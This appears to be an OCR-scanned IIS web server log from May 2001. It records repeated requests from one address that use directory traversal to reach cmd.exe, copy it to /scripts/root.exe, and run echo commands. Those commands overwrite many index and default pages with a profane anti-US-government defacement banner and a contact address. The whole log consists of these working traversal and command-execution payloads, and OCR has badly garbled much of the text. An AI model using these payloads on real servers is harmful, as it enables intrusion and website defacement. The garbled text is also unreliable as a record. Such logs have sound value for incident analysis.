/cecho-^«html^»^«body-tbgcolor?63Dblack^7^«br^2^«br^^^«br^»^«br^»^«br^»^«br^7^«ta. 
ble--width?63D10096^^«td^-^«p-align?63D9622center9622^7^«fonttsize963D 7 tcolor?63Dred 
^»fück--US A: Government^«/font^»^«tr^»^«td^7^«p-align963D9622center9022^7^-fonttsize 
763D7-color?63Dred^»fuck--PoizonBOx^«tr^7^«td^^^«p-ralign?63D9622center9622^7^«fontts 
ize%3D4+color%3Dred’>contact:sysadmen@yahoo.com.cn*</html>>../wwwroot/pagetemplat 
es.pez/index.asp 

502 - 

2001-05-06 10:45:00 128.84.234.79 - 24.9.173.59 80-GET /scripts/root.exe 


/c+echot’<html/>"<body+tbgcolor%3Dblack/>“<br’*>“<br*>“<br’*>*<br’>*<br’>*<br’>*<ta 
blet+width%3D100%*>*<td’>*<ptalign%3D%22center%22*>"<fonttsize%3D7+color%3Dred 
“>fuck+USA+Government*</font’>“<tr’>*<td/><ptalign%3D%22center%22’>“<fonttsize 
%3D7+color%3Dred>fuck+P oizonBOx™<tr’>*<td’>"<ptalign%3D%22center%22’>“<fontts 
ize%3D4+color%3Dred*>contact:sysadmen@yahoo.com.cn*</html’>>../wwwroot/pagetemplat 
es.pez/index. htm 

502 - 

2001-05-06 10:45:03 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot<html/>*<body+bgcolor%3Dblack*>“<br’>“<br’>“<br*><br*>*<br’*>*<br*>"<ta 
ble+width%3D100%*>*<td’>*<p+align%3D%22center%22’><font+size%3D7+color%3Dred 
A>fuck+USA+Government’*</font’>*<tr’><td’>"<ptalign%3D%22center%22">“<fonttsize 
%3D7+color%3Dred*>fuck+PoizonBOx’<tr’>“<td’>"<p+align%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</html“>>../Awwwroot/pagetemplat 
es.pez/default.asp 

502 - 

2001-05-06 10:45:05 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^»^«body-bgcolor?63Dblack^7^«br^»^«br^»^«br^»^«br^»^«br^2^«br^»^«ta 
bletwidth?63D 10096^7^«td^7^«p-align963D9622center9622^»^-«fontsize?63D7--color?63 Dred 
^»fück--US A--Government^«/font^»^«tr^»^«td^^^«p-align?63D9/22center9022^7^-fonttsize 
%3D7+color%3Dred“>fuck+PoizonBOx’<tr’>*<td*><ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred*>contact:sysadmen@yahoo.com.cn*</html“>>../wwwroot/pagetemplat 
es.pez/default htm 

502 - 

2001-05-06 10:45:06 128.84.234.79 - 24.9.173.59 80 GET /scripts/. /. /winnt/system32/cmd.exe 
/c+copy+\winnt\system32\cmd.exet+root.exe 502 - 

2001-05-06 10:45:08 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/cechot^«html^7^«body-"bgcolor?63Dblack^?^«br^^«br^»^«br^»^«br^»^«br^2^«br^7^-«ta 


blet+width%3D100%">*<td’><ptalign%3D%22center%22’>"<fonttsize%3D7+color%3Dred 
“>fuck+USA+Government</font’>“<tr’><td’><p+talign%3D%22center%22’>*<fonttsize 
%3D7+color%3Dred*>fuck+P oizonBOx*<tr><td’>*<ptalign%3D%22center%22’><font+s 
ize%3D4+color%3Dred”>contact:sysadmcn@yahoo.com.cn*</html”>>. Ga 
.asp 502 - 

2001-05-06 10:45:09 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho--^«html^»^«body--bgcolor?e3Dblack^^«br^»^«br^»^«br^7^«br^?^«br^^«br^^«ta 
ble-"width?/93D10096^^«td^7^«p-Falign?o3D9622center9622^»^«fonttsize?03D 7--color?63Dred 
“>fuck+USA+Government*</font/>“<tr’>"<td’>"<p+align%3D%22center%22"><fonttsize 
%3D7+color%3Dred’>fuck+P oizonBOx”<tr’>"<td’*>"<p+align%3D%22center%22’>“<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn”*</html’>>../wwwroot/ptjava/index 
-htm 502 - 

2001-05-06 10:45:11 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/c+echo+*<html/>"<body+bgcolor%3Dblack’*>“<br’*>*<br’*>*<br*>*<br’*><br’*>*<br’>"<ta 
ble+width%3D100%"><td’>*<ptalign%3D%22center%22/>*<font+size%3D7+color%3Dred . 
“>fuck+USA+Government</font/>"<tr’>*<td’>"<ptalign%3D%22center%22’>"<font+size 
%3D7+color%3Dred>fuck+PoizonBOx<tr’>“<td’>“<ptalign%3D%22center%22">"<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.co*</html’>>../wwwroot/ptjava/defau 
It.asp 502 - 

2001-05-06 10:45:11 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/c+echot<html/><bodytbgcolor%3Dblack’/>“<br’><br’>“<br’><br’>"<br’>"<br’>“<ta 
ble+width%3D 100%>*<td/>*<ptalign%3D%22center%22’>*<font+size%3D7+color%3 Dred 
“>fuck+USA+Government</font’>“<tr’>*<td’>*<ptalign%3D%22center%22’>"<fontt size 
%3D7+color%3Dred’>fuck+P oizonBOx’<tr*>“<td’>“<ptalign”%3D%22center%22">"<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</html>>. a HEN MO OU Parae 
It.htm 502 - 

2001-05-06 10:45:13 128.84.234.79 - 24.9.173.59 80 GET /scripts/. /../winnt/system32/cmd.exe 
/c+copyt+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:45:15 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ct+techo+*<html/>*<body+bgcolor%3Dblack*>*<br’*>“<br’*>“<br*>*<br’><br’*>"<br*>"<ta 
ble+width%3D 100%*>*<td*>*<ptalign%3D%22center%22*><font+size%3D7+color%3Dred 
“>fuck+USA+Government’*</font’><tr’>"<td’>*<ptalign%3D%22center%22">"<font+size 
%3D7+color%3Dred*>fuck+PoizonBOx’*<tr’>"<td’>"<ptalign%3D%22center%22’>“<fontts 
ize%3D4+color%3Dred*>contact:sysadmcn@yahoo.com. Oi aa /wwwroot/Secure/inde 
x.asp 502 - 

2001-05-06 10:45:17 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


[ctechot^«html^—^«body--bgcolor?e3Dblack^?^«br^»^«br^^^«br^?^«br^»^«br^7^«br^»^«ta 
bletwidth%3D100%*>*<td’><p+talign%3D%22center%22’><font+size%3D7+color%3Dred 
“>fuck+USA+Government*</font*>*<tr’>“<td’>"<ptalign%3D”o22center%22’><fontt size 
%3D7+color%3Dred*>fuck+P oizonBOx”<tr’>"<td’>*<ptalign%3 D%22center%22”>*<fontts 


l o 


ize%3D4+color%3Dred“>contact:sysadmcn@yahoo.com.cn’*</html/>>../wwwroot/Secure/inde 
x.htm 502 - 
2001-05-06 10:45:18 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho-t^«html^^^«body--bgcolor?63Dblack^»^«br^»^«br^»^«br^^«br^»^«br^»^«br^»^«ta 
bletwidth?63D 10094^—^«td^^^«p-align?63D9622center9622^7^-fonttsize?63D 7--color?63 Dred 
^»fück--USA- Government^«/font^»^«tr^»^«td^»^«p-align?03D9622center?622^7^«font size 
%3D7+color%3Dred*>fuck+P oizonBOx<tr’>*<td’>"<ptalign%3D%22center%22’><fontts 
ize%3D4+color%3 Dred’>contact:sysadmen@yahoo.com.cn’*</html’>>../wwwroot/Secure/defa 
ult.asp 502 - 

2001-05-06 10:45:21 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/c+echot<html>“<body+bgcolor%3 Dblack’*>"<br’*>“<br’>“<br’>"<br’>*<br’><br’><ta 
blet+width%3D100%*>“<td’>*<ptalign%3D%22center%22/>"<font+size%3D7+color%3Dred 
“>fuck+USA+Government™</font/>*<tr’>*<td/>"<p+align%3D%22center%22>"<fonttsize 
%3D7+color%3Dred*>fuck+P oizonBOx’<tr’>“<td*>*<ptalign%3D%22center%22’><fontts 
ize%3D4+color%3 Dred“*>contact:sysadmen@yahoo.com.cn’*</html“>>../wwwroot/Secure/defa 
ult.htm 502 - 

2001-05-06 10:45:22 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe 
./¢+copy+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:45:23 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho--^«html^7^«body-"bgcolor?s3Dblack^»^«br^»^«br^»^«br^»^«br^»^«br^»^«br^»^«ta 
blet+width%3D100%>“<td’>“<ptalign%3D%22center%22><fonttsize%3D7+color%3Dred 
“>fuck+USA+Government</font’>“<tr>“<td/>“<p+align%3D%22center%22’>"<fonttsize 
%3D7+color%3Dred“>fuck+PoizonBOx<tr’>*<td’><ptalign%3D%22center%224>“<fontts 
ize%3D4+color™%3Dred“>contact:sysadmcn@yahoo.com.cn’*</html>>../wwwroot/test/index.as 
p 502 - 

2001-05-06 10:45:24 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^»^«body-bgcolor$63Dblack^»^«br^»^«br^»^«br^^«br^^«br^»^«br^^«ta 
blet+width%3D100%*>*<td*>“<ptalign%3D%22center%22><fonttsize%3D7+color%3Dred 
“>fuck+USA+Government“</font’>“<tr’>“<td’>“<p+align%3D%22center%22’>"<fonttsize 
%3D7+color%3Dred>fuck+PoizonBOx’<tr’><td’><p+align%3D%22center%22*>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</html>>../wwwroot/test/index. ht 
m 502 - 

2001-05-06 10:45:25 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho+’<html’>“<body+bgcolor%3 Dblack/*>“<br’>“<br’>*<br’>*<br’><br’><br’><ta 
ble+width%3D100%>*<td’>“<p+align%3D%22center%22/>"<fonttsize%3D7+color%3 Dred 
“>fuck+USA+Government*</font’>“<tr’>*<td/>"<ptalign%3D%22center%22’>"<fonttsize 
%3D7+color%3 Dred“>fuck+P oizonBOx’<tr’>*<td*>"<p+talign%3D%22center%22>"<font+s 
ize%3D4+color%3Dred*>contact:sysadmcn@yahoo.com.cn</html>>../wwwroot/test/default.a 
sp 502 - 

2001-05-06 10:45:27 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^»^«body-tbgcolor9?63Dblack^7^«br^^^«br^?»^«br^»^«br^2^«br^7^«br^^^«ta 
blet+width%3D100%*>*<td*>*<ptalign%3D%22center%22/><font+size%3D7+color%3Dred 
“>fuck+USA+Government*</font’><tr’>"<td/>"<ptalign%3D%22center%22’>“<fonttsize 
53D 7--color?63Dred^»fücktPoizonBOx^«tr^»^«td^»^«p-align963D9622center?622^7^« fonts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn’*</himl’>>../wwwroot/test/default.h 
tm 502 - 

2001-05-06 10:45:27 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe 
/c+copy+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:45:28 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho+<html/>“<body+bgcolor%3Dblack*>*<br’>“<br’>“<br’>“<br’>“<br*>*<br’>“<ta 
ble+width%3D100%*>“<td’>"<p+align%3D%22center%22’>*<fonttsize%3 D7+color%3Dred 
“>fuck+USA+Government*</font’>“<tr’>“<td/>"<ptalign%3D%22center%22*><font+size 
%3D7+color%3Dred>fuck+P oizonBOx’<tr’>“<td/>"<ptalign%3D%22center%22°>“<fontts 
ize%3D4+color%3Dred*>contact:sysadmcn@yahoo.com.cn*</html’>>../wwwroot/_borders/ind 
ex.asp 502 - 

2001-05-06 10:45:28 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^7^«body-tbgcolor9?63Dblack^7^«br^»^«br^7^«br^^«br^7^«br^7^«br^^^«ta 
blet+width%3D100%">*<td*>*<ptalign%3D%22center%22“><font+size703D7+color%3 Dred 
“>fuck+USA+Government*</font*>“<tr’>“<td’>*<p+align%3D%22center%22’>"<fonttsize 
%3D7+color%3Dred’>fuck+P oizonBOx’<tr’><td’>"<ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred*>contact:sysadmcn@yahoo.com.cn*</html’>>../wwwroot/_borders/ind 
ex.htm 502 - 

2001-05-06 10:45:29 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«htmi^»^«body-tbgcolor?63Dblack^»^«br^»^«br^»^«br^^«br^2^«br^7^«br^»^&ta. 
blet+width%3D100%>*<td’><ptalign%3D%22center%22/><fonttsize%3D7+color%3Dred 
A>fuck+USA+Government*</font’>“<tr’>“<td’>"<ptalign%3D%22center%22’>"<fonttsize 
%3D7+color%3Dred’>fuck+P oizonBOx’<tr’>*<td*>*<ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</html“>>../wwwroot/_borders/def 
ault.asp 502 - i 

2001-05-06 10:45:29 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot*<html’>“<body+bgcolor%3Dblack*>“<br’>*<br’*>“<br*>"<br’*><br’>“<br’>“<ta 
blet+width%3D100%>“<td’>“<p+align%3D%22center%22’><font+size%3D7+color%3Dred 
A>fuck+USA+Government*</font’>“<tr’>*<td’><p+align%3D%22center%22’><font+size 
%3D7+color%3Dred*>fuck+PoizonBOx<tr’>*<td’>"<ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmcen@yahoo.com.cn*</html>>../wwwroot/_borders/def 
ault.htm 502 - 

2001-05-06 10:45:31 128,84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe 
/ctcopy+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:45:33 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


e 8 


/ctechot^«html^»^«body-tbgcolor?63Dblack^^^«br^»^«br^»^«br^?^«br^7^«br^»^«br^-^«ta 
blet+width%3D100%*>*<td’*>"<ptalign%3D%22center%22’>*<fonttsize%o3D7+color%3Dred 
“>fuck+USA+Government’</font/>"<tr’>*<td’>"<ptalign%3D%22center%22’>"<fonttsize 


: ¥%3D7+color%3Dred*>fuck+PoizonBOx’<tr’>“<td/>“<ptalign%3D%22center%22">"<fontts 


ize%3D4+color%3Dred*>contact:sysadmcn@yahoo.com.cn’*</html*>>../wwwroot/_cusudi/inde 
x.asp 502 - 
2001-05-06 10:45:33 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho-^«btml^7^«body-tbgcolor?63Dblack^^«br^»^«br^»^«br^»^«br^»^«br^»^«br^»^«ta. 
ble+width%3D100%>*<td’>"<p+align%3D%22center%22/>*<font+size%3D7+color%3Dred 
A>fuck+USA+Government’</font/>"<tr’>"<td’>*<ptalign%3D%22center%22’><font+size 
%3D7+color%3Dred’>fuck+P oizonBOx’<tr’>“<td’>*<ptalign%3D%22center%22’>*<fontts 
ize%3D4+color%3Dred*>contact:sysadmen@yahoo.com.cn’*</html“>>../wwwroot/_cusudi/inde 
x. htm 502 - 

2001-05-06 10:45:34 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/c+echo+’<html>"<body+bgcolor%3 Dblack’>“<br’*>*<br’><br*>“<br’*><br*>*<br*>*<ta 
ble+width%3D100%>*<td’>*<ptalign%3D%22center%22/>“<font+size%3D7+color%3Dred 
^»fück--US At Government^«/font^»^«tr^»^«td^^^«p-align?63D9622center?622^7^«fonttsize 
963D7-*color?e3Dred^»fuck--PoizonBOx^«tr^7^«td^^^«p-align963D9622center?622^^^«fonts 
ize?93D4--color?63Dred^»contact:sysadmcn(a)yahoo.com.cn^«/html^77. /wwwroot/ cusudi/defa 
ult.asp 502 - 

2001-05-06 10:45:35 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechó--^«html^»^«body-tbgcolor?63Dblack^»^«br^»^«br^»^«br^7^«br^»^«br^2^«br^^«ta 
ble--width?63D10096^—^«td^7^«p-Falign?63D9/22center9622^^«fonttsize763D7--color?e3D red 
“>fuck+USA+Government</font’>*<tr’>"<td’><ptalign%3D%22center%22’><font+size 
%3D7+color%3Dred>fuck+P oizonBOx’<tr’>*<td’><ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</html>>../wwwroot/_cusudi/defa 
ult.htm 502 - 

2001-05-06 10:45:37 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe 
/ct+copy+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:45:37 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/c-echo--^«html^»^«body-tbgcolor?63Dblack^^«br^»^«br^^^«br^»^«br^^«br^»^«br^2^-«ta 
ble--width?63D 1009/6^^«td^7^«p--align?e3D9622center?622^7^«fonttsize963D 7--color?03 Dred 
A>fuck+USA+Government*</font’>*<tr’>*<td’>"<ptalign%3D%22center%22/><font+size 
%3D7+color%3Dred’>fuck+PoizonBOx’<tr>"<td’>"<p+align%3D%22center%22">"<font+s 
ize%3D4+color%3Dred’>contact:sysadmen@yahoo.com.cn*</html>>../wwwroot/_derived/ind 
ex.asp 502 - ; 

2001-05-06 10:45:38 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho*^«hbtml^7^«body-tbgcolor?63Dblack^»^«br^»^«br^»^«br^»^«br^»^«br^2^«br^^^«ta 
ble--width?93D 1009/9^7^«td^7^«p-Falign?e3D9/622center9622^^-fonttsize963D' 7t-color?63Dred 
“>fuck+USA+Government*</font*>*<tr’>“<td’><ptalign%3D%22center%o22*><fonttsize 
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?63D7--color?e3Dred^»fuck--PoizonBOx^«tr^»^«td^7^«p-*align?o3D9622center?022^7^-fontts 
ize?93D4--color?63Dred^»contact:sysadmcn(g)yahoo.com.cn^«/html^7. /wwwroot/ derived/ind 
ex.htm 502 - l 

2001-05-06 10:45:40 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho--^«html^»^«body-tbgcolor?e3Dblack^»^«br^»^«br^»^«br^^«br^7^«br^^«br^7^«ta 
ble+width%3D100%>*<td’>*<ptalign%3D%22center%22’>"<fonttsize%3D7+color%3Dred 
“>fuck+USA+Government’</font*>“<tr’>*<td/>"<p+talign%3D%22center%22’><font+size 
263D7-4color?63Dred^»fuck-*PoizonBOx^«tr^»^«td^»^«p-align?63D'/22center?622^7^«fontts 
ize?63D4--color?63Dred^»contact:sysadmen(g)yahoo.com.cn^«/html^7. /wwwroot/ derived/def 
ault.asp 502 - 

2001-05-06 10:45:42 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho-^«html^»^«body-"bgcolor?63Dblack^?^«br^»^«br^»^«br^»^«br^7^«br^?^«br^7^«ta 
ble+width%3D100%>"<td’>*<ptalign%3D%22center%22’>"<fonttsize%3D7+color%3Dred 
^»fück--US A--Government^«/font^^^«tr^»^«td^^^«p-align?63D9622center?622^7^-«fonttsize 
%3D7+color%3Dred’>fuck+P oizonBOx<tr>“<td’>“<ptalign%3D%22center%22"><fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</html>>../wwwroot/_derived/def 
ault.htm 502 - 

2001-05-06 10:45:42 128.84.234.79 - 24.9.173.59 80 GET /scripts/. /. ./winnt/system32/cmd.exe 
/ct+copy+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:45:43 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^»^«body-bgcolor?63Dblack^»^«br^^^«br^»^«br^^^«br^»^«br^»^«br^7^«ta 
blet+width%3D100%>*<td’>*<ptalign%3D%22center%22’><fonttsize%3D7+color%3Dred 
“>fuck+USA+Government*</font/>“<tr’>*<td’>"<ptalign%3D%22center%22%>"<font+tsize 
%3D7+color%3Dred*>fuck+P oizonBOx<tr’>*<td’>"<ptalign%3D%22center%22’><fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn</html>>../wwwroot/_disc2/index 
.asp 502 - 

2001-05-06 10:45:45 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/c+echot<html’><body+bgcolor%3Dblack*>“<br’>"<br’*>*<br’>“<br’>“<br’>"<br’>*<ta 
ble+width%3D100%>“<td*><p+align%3D%22center%22><fonttsize%3D7+color%3Dred 
“>fuck+USA+Government’*</font’>“<tr’>*<td’>“<p+align%3 D%22center%22’>"<font+size 
%3D7+color%3Dred“>fuck+PoizonBOx’<tr’>*<td*>"<ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmen@yahoo.com.cn’</html>>../wwwroot/_disc2/index 
-btm 502 - 

2001-05-06 10:45:46 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho^«html^»^«body-bgcolor?e3Dblack^»^«br^»^«br^»^«br^»^«br^^«br^^«br^»^«ta 
ble+width%3D100%>*<td*>"<ptalign%3D%22center%22’>"<font+size/3D7+color%3Dred 
A>fuck+USA+Government’*</font’>*<tr’>*<td’>"<ptalign%3D%22center%22’>"<font+size 
%3D7+color%3Dred’>fuck+P oizonBOx’<tr’>*<td’>"<ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmen@yahoo.com.cn</html“>>../wwwroot/_disc2/defau 
It.asp 502 - 


o 


2001-05-06 10:45:49 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/cecho-t-^«html^^^«body-bgcolor?e3Dblack^2^«br^?^«br^7^«br^»^«br^^«br^7^«br^»^«ta 
bletwidth%3D100%>*<td’*>“<p+align%3D%22center%22’>"<fonttsize/%03D7+color%3 Dred 
A>fuck+USA+Government</font’><tr’>"<td’>"<ptalign%3D%22center%22“>"<fonttsize 
263D7--color?e3Dred^»fücktPoizonBOx^«tr^^^«td^7^«p-align?63D9622center9622^7^«fontts 
ize%3D4+color%3Dred’>contact:sysadmen@yahoo.com.cn’</html>>../wwwroot/_disc2/defau 
It.htm 502 - 

2001-05-06 10:45:50 128.84.234.79 - 24.9.173.59 80 GET /scripts/. /. /winnt/system32/cmd.exe 
/ct+copy+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:45:53 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


[ckechot^chtml^»^cbody bgcolor/ó3Dblack^r»^cbr^»^«br^»^«br^»^cbr^»^ cbr^» ^ cbr^» ^ta 
ble+width%3D 100%*>*<td’>*<p+align%3D%22center%22">"<font+size%3D7+color%3 Dred 
“>fuck+USA+Government®</font*>“<tr’>“<id’>"<ptalign%3 D%22center%22’><fonttsize 
%3D7+color%3Dred’>fuck+P oizonBOx’<tr’>“<td’>"<ptalign%3D%22center%22/>"<fontts 
_ize%3D4+color%3Dred”>contact:sysadmen@yahoo.com.cn*</html>>../wwwroot/_fpclass/ind 
ex.asp 502 - 

2001-05-06 10:45:54 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/c+echot<html/>*<bodyt+bgcolor%3 Dblack*>“<br*>“<br*>*<br’><br*>*<br*><br’>"<ta 
bletwidth%3D100%>*<td’>"<p+align%3D%22center%22’><font+size%3D7+color%3Dred 
“>fuck+USA+Government’</font*>“<tr’>*<td’><ptalign%3D%22center%22’>"<fontt size 
%3D7+color%3Dred’>fuck+PoizonBOx<tr’>*<td’>"<ptalign%3D%22center%22’><fontts 
ize%3D4+color%3Dred’>contact:sysadmen@yahoo.com.cn*</html“>>../wwwroot/_fpclass/ind 
ex. htm 502 - 

2001-05-06 10:45:54 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho+“<html“>*<bodyt+bgcolor%3Dblack’*>“<br’>“<br’>“<br’>“<br’><br’>“<br’>"<ta 
ble+width%3D100%*>*<td’>“<p+align%3D%22center%22”>"<font+size%3D7+color%3Dred 
^»fückt US A--Government^«/font^^^«tr^»^«td^^^«p-align?63D9622center?022^7^«fonttsize 
%3D7+color%3Dred’>fuck+P oizonBOx”<tr’>*<td’>"<ptalign%3D%22center%22">"<font+s 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn</html’>>../wwwroot/_fpclass/def 
ault.asp 502 - 

2001-05-06 10:45:56 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^7^«body-bgcolor?e3Dblack^^^«br^7^«br^»^«br^^«br^»^«br^»^«br^7^«ta 
ble-Fwidth?/63D 1009 6^7^«td^7^«p-Falign?63D9622center?622^7^-fonttsize903D 7--color?03Dred 
“>fuck+USA+Government*</font’>“<tr’>“<td’>"<ptalign%3D%22center%22°><fonttsize 
%3D7+color%3Dred’>fuck+PoizonBOx<tr’>“<td’>"<ptalign%3D%22center%22/><fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn’*</html>>../wwwroot/_fpclass/def 
ault.htm 502 - 

2001-05-06 10:45:57 128.84.234.79 - 24.9.173.59 80 GET /scripts/. /. ./winnt/system32/cmd.exe 
/c+copyt+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:45:59 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


l e 


/ctecho-^«html^»^«body--bgcolor?e3Dblack^?^«br^»^«br^»^«br^^«br^»^«br^»^«br^?^«ta. 
blet+width%3D100%*>*<td’>*<ptalign%3D%22center%22/>"<fontt+size%3D7+color%3Dred 
“>fuck+USA+Government’*</font’>“<tr’>"<td*><ptalign%3D%22center%22’>"<font+size 
%3D7+color%3Dred’>fuck+PoizonBOx’<tr’>*<td’>“<ptalign%3 D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.ca*</html>>../wwwroot/_private/ind 
ex.asp 502 - 

2001-05-06 10:45:59 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^»^«body-bgcolor?e3Dblack^?^«br^7^«br^»^«br^-^«br^»^«br^?^«br^7^-«ta 
ble+width%3D100%"><td/><ptalign%3D%22center%22>"<font+size%3D7+color%3Dred 
A>fuck+USA+Government’*</font*>“<tr’>"<td’>"<ptalign%3D%22center%22">"<fonttsize 
%3D7+color%3Dred’>fuck+P oizonBOx”<tr’><td’>"<p+align/%3D%22center%o22">"<fontts 
ize%3D4+color%3Dred“>contact:sysadmcen@yahoo.com.cn</html>>../wwwroot/_private/ind 
ex.htm 502 - 

2001-05-06 10:46:00 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/c+echot<html/>“<bodytbgcolor%3Dblack/*>“<br’>“<br*>“<br’>"<br’><br’*>"<br’><ta 
ble+width%3D100%>*<td’>*<ptalign%3D%22center%22’><fonttsize%3D7+color%3Dred 
A>fuck+USA+Government’*</font/>*<tr’>"<td/>*<ptalign%3D%22center%22/>"<fontt size 
963D7--color?63Dred^»fuck--PoizonBOx^«tr^^^«td^^^«p-talign?63 D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmen@yahoo.com.cn*</html>>../wwwroot/_private/def 
ault.asp 502 - : 

2001-05-06 10:46:02 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^»^«body--bgcolor?63Dblack^?^«br^»^«br^»^«br^^«br^»^«br^»^«br^?^«ta 
ble+width%3D100%>*<td’>"<ptalign%3D%22center%22’><fonttsize%3D7+color%3Dred 
“>fuck+USA+Government’*</font/>“<tr’>*<td’>“<ptalign%3D%22center%22’><fonttsize 
%3D7+color%3Dred’>fuck+PoizonBOx’<tr’>*<td’><ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn</html>>../wwwroot/_private/def 
ault.htm 502 - 

2001-05-06 10:46:02 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe 
/c+copy+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:46:04 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^7^«body--bgcolor?e3Dblack^?^«br^»^«br^»^«br^^«br^»^«br^»^«br^»^«ta 
ble+width%3D100%*><td*>“<ptalign%3D%22center%22’><font+size%o3D7+color%3Dred 
A>fuck+USA+Government’</font’>*<tr’>”*<td’/>"<ptalign%3D%22center%22’>“<fontt size 
%3D7+color%3Dred*>fuck+PoizonBOx’<tr’>*<td’>"<ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn’</html>>../wwwroot/_themes/ind 
ex.asp 502 - 

2001-05-06 10:46:04 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


[ctecho--^«html^»^«body-"bgcolor?e3Dblack^»^«br^»^«br^»^«br^»^«br^7^«br^»^«br^-^-ta 
ble--width963D10096^—^«td^7^«p-align?43D9/622center9622^7^-fonttsize?63D 7--color?63Dred 


e 


^»fück--USAtGovernment^«/font^»^«tr^»^«td^»^«p-align?63D9/22center9622^^^«font size 
963D7-color?63Dred^fuck--PoizonBOx^«tr^»^«td^^^«p-align?63D7622cente19622^»^«fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn’</html’>>../wwwroot/_themes/ind 
ex.htm 502 - 

2001-05-06 10:46:06 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/c+echo+*<html’>*<body+bgcolor%3Dblack’>“<br’*>*<br’*><br*>*<br’>*<br’>“<br’>*<ta 
ble+width%3D100%*>*<td’>“<ptalign%3D%22center%22"><font+size%3D7+color%3 Dred 
